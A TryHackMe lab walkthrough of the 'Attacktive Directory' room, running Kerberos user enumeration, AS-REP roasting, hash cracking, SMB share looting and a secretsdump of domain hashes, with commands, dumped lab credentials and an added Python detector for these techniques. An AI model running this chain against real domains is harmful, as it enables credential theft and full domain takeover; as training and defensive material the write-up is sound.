Attacktive Directory
- 🌐 Website: TryHackMe
- 🔥 Level: Medium
- 🖥️ OS: N/D
- 🔗 Link: Attacktive Directory
First of all, let's run nmap and save the output so it is always available:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ nmap -sV -sC 10.113.167.216 | tee nmap.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-14 14:41 +0100
Nmap scan report for 10.113.167.216
Host is up (0.036s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-14 13:42:03Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2026-03-13T13:39:13
|_Not valid after: 2026-09-12T13:39:13
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-03-14T13:42:06+00:00
|_ssl-date: 2026-03-14T13:42:14+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-14T13:42:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds
Welcome to Attacktive Directory
❓Question
What tool will allow us to enumerate port 139/445?
📋 Walkthrough
One of the most widely used tools for enumerating the SMB/NetBIOS services on ports 139 and 445 of an Active Directory host is enum4linux.
Answer
enum4linux
❓Question
What is the NetBIOS-Domain Name of the machine?
📋 Walkthrough
It can be read from the rdp-ntlm-info block of the nmap output (NetBIOS_Domain_Name).
Answer
THM-AD
❓Question
What invalid TLD do people commonly use for their Active Directory Domain?
📋 Walkthrough
It can be read from the nmap output: the domain is spookysec.local.
Answer
.local
Enumerating Users via Kerberos
❓Question
What command within Kerbrute will allow us to enumerate valid usernames?
📋 Walkthrough
In this section there are two files to download: userlist.txt and passwordlist.txt.
After installing kerbrute on Kali, we can check its help for the enumeration command:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ kerbrute -h
Version: v1.0.3 (9dad6e1) - 03/14/26 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
Answer
userenum
❓Question
What notable account is discovered? (These should jump out at you)
📋 Walkthrough
Let's run kerbrute userenum against the DC with the provided userlist.txt to discover valid users:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ kerbrute userenum --dc 10.113.167.216 -d "spookysec.local" userlist.txt
Version: v1.0.3 (9dad6e1) - 03/14/26 - Ronnie Flathers @ropnop
2026/03/14 14:59:35 > Using KDC(s):
2026/03/14 14:59:35 > 10.113.167.216:88
2026/03/14 14:59:35 > [+] VALID USERNAME: james@spookysec.local
2026/03/14 14:59:36 > [+] VALID USERNAME: svc-admin@spookysec.local
2026/03/14 14:59:36 > [+] VALID USERNAME: James@spookysec.local
2026/03/14 14:59:37 > [+] VALID USERNAME: robin@spookysec.local
2026/03/14 14:59:40 > [+] VALID USERNAME: darkstar@spookysec.local
2026/03/14 14:59:42 > [+] VALID USERNAME: administrator@spookysec.local
2026/03/14 14:59:46 > [+] VALID USERNAME: backup@spookysec.local
2026/03/14 14:59:47 > [+] VALID USERNAME: paradox@spookysec.local
2026/03/14 15:00:00 > [+] VALID USERNAME: JAMES@spookysec.local
2026/03/14 15:00:04 > [+] VALID USERNAME: Robin@spookysec.local
2026/03/14 15:00:27 > [+] VALID USERNAME: Administrator@spookysec.local
2026/03/14 15:01:21 > [+] VALID USERNAME: Darkstar@spookysec.local
2026/03/14 15:01:38 > [+] VALID USERNAME: Paradox@spookysec.local
2026/03/14 15:02:28 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2026/03/14 15:02:47 > [+] VALID USERNAME: ori@spookysec.local
Let's save the discovered usernames to users.txt for the next step.
Answer
svc-admin
❓Question
What other notable account is discovered? (These should jump out at you)
Answer
backup
Abusing Kerberos
❓Question
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
📋 Walkthrough
Let's use GetNPUsers.py from Impacket to find accounts with the "Do not require Kerberos preauthentication" flag (UF_DONT_REQUIRE_PREAUTH) set. For such an account the KDC returns an AS-REP, encrypted with a key derived from the user's password, without any password being presented, so the response can be taken away and cracked offline:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-GetNPUsers -no-pass -usersfile users.txt -dc-ip 10.113.167.216 spookysec.local/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:2f798d84f36076ba870f070761cacf80$f562a4c152f1100761bddbe47e6b224bd8fc979629f989bf3a216a4f71355187b8187c20111df37a4ad5c1e802de096e8a3ce8c53e4d0f6a9d7b56f28aa26f1571a80a65bce5f2623b9e66f65f668fb2b5dcce09cb2f89390eb870c8a558c8819cb67d9b63a90ff67666e9a21b584504fedd7b56be1c9599bf03b016f360d30d5f4ffaed88ff855f2ba56978d93a271dbfcf148f7e3397c7f1659057f002e1f0320d170efdcd41334b619e53dbf9c1a7841c39074b3d67d6f85a861cbe2b131ad5e00032a3ddccdfadd624fac00cc213bcd36c89e9c7c5f3750d73bb8cb2cb564ae318abe1804789aa508e45be28ab04d66b
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
Only svc-admin has UF_DONT_REQUIRE_PREAUTH set, so the KDC returned its AS-REP hash; we save it to a file named hash for cracking.
Answer
svc-admin
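Added example, not from the original write-up: detection logic for the two Kerberos techniques used above, username enumeration with kerbrute userenum and AS-REP roasting with GetNPUsers. It runs over constructed records modelled on Windows Security event 4768 (TGT request; field names TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType). The client IPs and probed names are constructed, and the approach assumes Kerberos Authentication Service auditing is enabled for both success and failure on the DC.

```python
from collections import Counter

# Values as they appear in the event's XML fields.
STATUS_SUCCESS = "0x0"                 # TGT issued
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"    # no such principal: the footprint of username guessing
KDC_ERR_PREAUTH_REQUIRED = "0x19"      # user exists, pre-auth needed: how kerbrute tells valid names apart
PREAUTH_NONE = "0"                     # no pre-authentication: UF_DONT_REQUIRE_PREAUTH accounts
ETYPE_RC4_HMAC = "0x17"                # etype 23, the hashcat 18200 case above

ENUM_THRESHOLD = 10   # unknown-principal responses from one client before we alert

ATTACKER_IP = "10.10.14.5"       # constructed
WORKSTATION_IP = "10.10.10.50"   # constructed


def _event(user, ip, status, preauth, etype):
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample events: a wordlist run from one client (mostly unknown names,
# a few valid ones answered with 0x19), one AS-REP issued with no pre-auth to
# svc-admin, and a normal AES logon from a workstation. Failed 4768 events carry
# "-" as pre-auth type and 0xffffffff as encryption type.
SAMPLE_EVENTS = (
    [_event(name, ATTACKER_IP, KDC_ERR_C_PRINCIPAL_UNKNOWN, "-", "0xffffffff")
     for name in ("aaron", "abby", "adam", "alex", "alice", "amy",
                  "andy", "anna", "ben", "bob", "carl", "dan")]
    + [_event(name, ATTACKER_IP, KDC_ERR_PREAUTH_REQUIRED, "-", "0xffffffff")
       for name in ("james", "robin", "backup")]
    + [_event("svc-admin", ATTACKER_IP, STATUS_SUCCESS, PREAUTH_NONE, ETYPE_RC4_HMAC),
       _event("james", WORKSTATION_IP, STATUS_SUCCESS, "2", "0x12")]
)


def detect_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """Map client IP -> number of KDC_ERR_C_PRINCIPAL_UNKNOWN responses, for
    clients at or above the threshold. Many non-existent names requested from
    one source is what kerbrute userenum looks like from the DC's side."""
    unknown = Counter(e["IpAddress"] for e in events
                      if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in unknown.items() if n >= threshold}


def probed_users(events, client_ip):
    """Usernames one client asked for, split into confirmed-valid (0x19 or a
    TGT) and unknown (0x6); useful for scoping which accounts were exposed."""
    valid, unknown = set(), set()
    for e in events:
        if e["IpAddress"] != client_ip:
            continue
        if e["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown.add(e["TargetUserName"])
        elif e["Status"] in (KDC_ERR_PREAUTH_REQUIRED, STATUS_SUCCESS):
            valid.add(e["TargetUserName"])
    return sorted(valid), sorted(unknown)


def detect_asrep_roast(events):
    """(user, client_ip, rc4) for every TGT issued without pre-authentication.
    PreAuthType 0 on a successful 4768 means the account has
    UF_DONT_REQUIRE_PREAUTH; rc4 marks etype 0x17, the cheap-to-crack case."""
    return [(e["TargetUserName"], e["IpAddress"],
             e["TicketEncryptionType"] == ETYPE_RC4_HMAC)
            for e in events
            if e["Status"] == STATUS_SUCCESS and e["PreAuthType"] == PREAUTH_NONE]


if __name__ == "__main__":
    for ip, n in detect_user_enumeration(SAMPLE_EVENTS).items():
        valid, unknown = probed_users(SAMPLE_EVENTS, ip)
        print(f"[enum]  {ip}: {n} unknown principals; valid names exposed: {valid}")
    for user, ip, rc4 in detect_asrep_roast(SAMPLE_EVENTS):
        print(f"[asrep] TGT issued without pre-auth for {user} from {ip}; RC4={rc4}")
```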
❓Question
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Answer
Kerberos 5, etype 23, AS-REP
❓Question
What mode is the hash?
Answer
18200
❓Question
Now crack the hash with the modified password list provided. What is the user account's password?
📋 Walkthrough
Let's run hashcat in mode 18200 against the saved hash file with the provided passwordlist.txt:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ hashcat -m 18200 hash passwordlist.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14907/29814 MB (4096 MB allocatable), 24MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 518 MB (24940 MB free)
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70189
* Bytes.....: 569237
* Keyspace..: 70189
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:2f798d84f36076ba870f070761cacf80$f562a4c152f1100761bddbe47e6b224bd8fc979629f989bf3a216a4f71355187b8187c20111df37a4ad5c1e802de096e8a3ce8c53e4d0f6a9d7b56f28aa26f1571a80a65bce5f2623b9e66f65f668fb2b5dcce09cb2f89390eb870c8a558c8819cb67d9b63a90ff67666e9a21b584504fedd7b56be1c9599bf03b016f360d30d5f4ffaed88ff855f2ba56978d93a271dbfcf148f7e3397c7f1659057f002e1f0320d170efdcd41334b619e53dbf9c1a7841c39074b3d67d6f85a861cbe2b131ad5e00032a3ddccdfadd624fac00cc213bcd36c89e9c7c5f3750d73bb8cb2cb564ae318abe1804789aa508e45be28ab04d66b:[REDACTED]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.L...04d66b
Time.Started.....: Sat Mar 14 15:18:24 2026 (0 secs)
Time.Estimated...: Sat Mar 14 15:18:24 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 840.3 kH/s (1.35ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/70189 (35.01%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/70189 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: m123456 -> 280890
Hardware.Mon.#01.: Temp: 49c Util: 6%
Started: Sat Mar 14 15:18:11 2026
Stopped: Sat Mar 14 15:18:25 2026
We got the password: svc-admin:[REDACTED]
Answer
management2005
Back to the Basics
❓Question
What utility can we use to map remote SMB shares?
Answer
smbclient
❓Question
Which option will list shares?
Answer
-L
❓Question
How many remote shares is the server listing?
📋 Walkthrough
Let's list the available shares with smbclient, authenticating as svc-admin:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ smbclient -L \\10.113.167.216 -U "svc-admin" -p
Password for [WORKGROUP\svc-admin]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.113.167.216 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Answer
6
❓Question
There is one particular share that we have access to that contains a text file. Which share is it?
Answer
backup
❓Question
``
📋 Walkthrough
To use a different tool, I decided to try impacket-smbclient:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-smbclient spookysec.local/svc-admin:management2005@10.113.167.216
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# list
*** Unknown syntax: list
# ls
[-] No share selected
# help
open {host,port=445} - opens a SMB connection against the target host/port
reconnect - reconnect connection, useful for broken pipes & interrupted sessions
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
lls {dirname} - lists all the files on the local filesystem.
tree {filepath} - recursively lists all files in folder and sub folders
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put (unknown) - uploads the filename into the current path
get (unknown) - downloads the filename from the current path
mget {mask} - downloads all files from the current directory matching the provided mask
cat (unknown) - reads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
# shares
ADMIN$
backup
C$
IPC$
NETLOGON
SYSVOL
# use backup
# ls
drw-rw-rw- 0 Sat Apr 4 21:08:39 2020 .
drw-rw-rw- 0 Sat Apr 4 21:08:39 2020 ..
-rw-rw-rw- 48 Sat Apr 4 21:08:53 2020 backup_credentials.txt
# get backup_credentials.txt
Answer
backup
❓Question
What is the content of the file?
Answer
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
❓Question
Decoding the contents of the file, what is the full contents?
📋 Walkthrough
The file content is base64-encoded; decoding it yields a username and password.
Answer
backup@spookysec.local:backup2517860
Elevating Privileges within the Domain
❓Question
What method allowed us to dump NTDS.DIT?
📋 Walkthrough
Let's check the help of impacket-secretsdump:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-secretsdump
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY] [-security SECURITY] [-sam SAM] [-ntds NTDS]
[-resumefile RESUMEFILE] [-skip-sam] [-skip-security] [-outputfile OUTPUTFILE] [-use-vss]
[-rodcNo RODCNO] [-rodcKey RODCKEY] [-use-keylist] [-exec-method [{smbexec,wmiexec,mmcexec}]]
[-use-remoteSSWMI] [-use-remoteSSWMI-NTDS] [-remoteSSWMI-remote-volume REMOTESSWMI_REMOTE_VOLUME]
[-remoteSSWMI-local-path REMOTESSWMI_LOCAL_PATH] [-just-dc-user USERNAME] [-ldapfilter LDAPFILTER]
[-just-dc] [-just-dc-ntlm] [-skip-user SKIP_USER] [-pwd-last-set] [-user-status] [-history]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]
[-target-ip ip address]
target
Performs various techniques to dump secrets from the remote machine without executing any agent there.
positional arguments:
target [[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files)
options:
-h, --help show this help message and exit
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
-system SYSTEM SYSTEM hive to parse (only binary REGF, as .reg text file lacks the metadata to compute the
bootkey)
-bootkey BOOTKEY bootkey for SYSTEM hive
-security SECURITY SECURITY hive to parse
-sam SAM SAM hive to parse
-ntds NTDS NTDS.DIT file to parse
-resumefile RESUMEFILE
resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file
will also be used to keep updating the session's state
-skip-sam Do NOT parse the SAM hive on remote system
-skip-security Do NOT parse the SECURITY hive on remote system
-outputfile OUTPUTFILE
base output filename. Extensions will be added for sam, secrets, cached and ntds
-use-vss Use the NTDSUTIL VSS method instead of default DRSUAPI
-rodcNo RODCNO Number of the RODC krbtgt account (only avaiable for Kerb-Key-List approach)
-rodcKey RODCKEY AES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)
-use-keylist Use the Kerb-Key-List method instead of default DRSUAPI
-exec-method [{smbexec,wmiexec,mmcexec}]
Remote exec method to use at target (only when using -use-vss). Default: smbexec
-use-remoteSSWMI Remotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse
locally
-use-remoteSSWMI-NTDS
Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a
DC. IMPORTANT: this flag only works when also using -use-remoteSSWMI
-remoteSSWMI-remote-volume REMOTESSWMI_REMOTE_VOLUME
Remote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to
C:\
-remoteSSWMI-local-path REMOTESSWMI_LOCAL_PATH
Path where download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current path
display options:
-just-dc-user USERNAME
Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies
also -just-dc switch
-ldapfilter LDAPFILTER
Extract only NTDS.DIT data for specific users based on an LDAP filter. Only available for DRSUAPI
approach. Implies also -just-dc switch
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-skip-user SKIP_USER Do NOT extract NTDS.DIT data for the user specified. Can provide comma-separated list of users to
skip, or text file with one user per line
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile data
-user-status Display whether or not the user is disabled
-history Dump password history, and LSA secrets OldVal
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target
parameters. If valid credentials cannot be found, it will use the ones specified in the command
line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-keytab KEYTAB Read keys for SPN from keytab file
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the
target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is
useful when target is the NetBIOS name and you cannot resolve it
Let's use -just-dc to dump the NTDS.DIT data for every domain account, authenticating with the backup credentials we just decoded:
┌──(kali㉿kali)-[~/Desktop/THM]
└─$ impacket-secretsdump -just-dc spooky.sec/backup:backup2517860@10.113.167.216
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:c5a191aea415aa6dbe3f9df7e682eb6c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
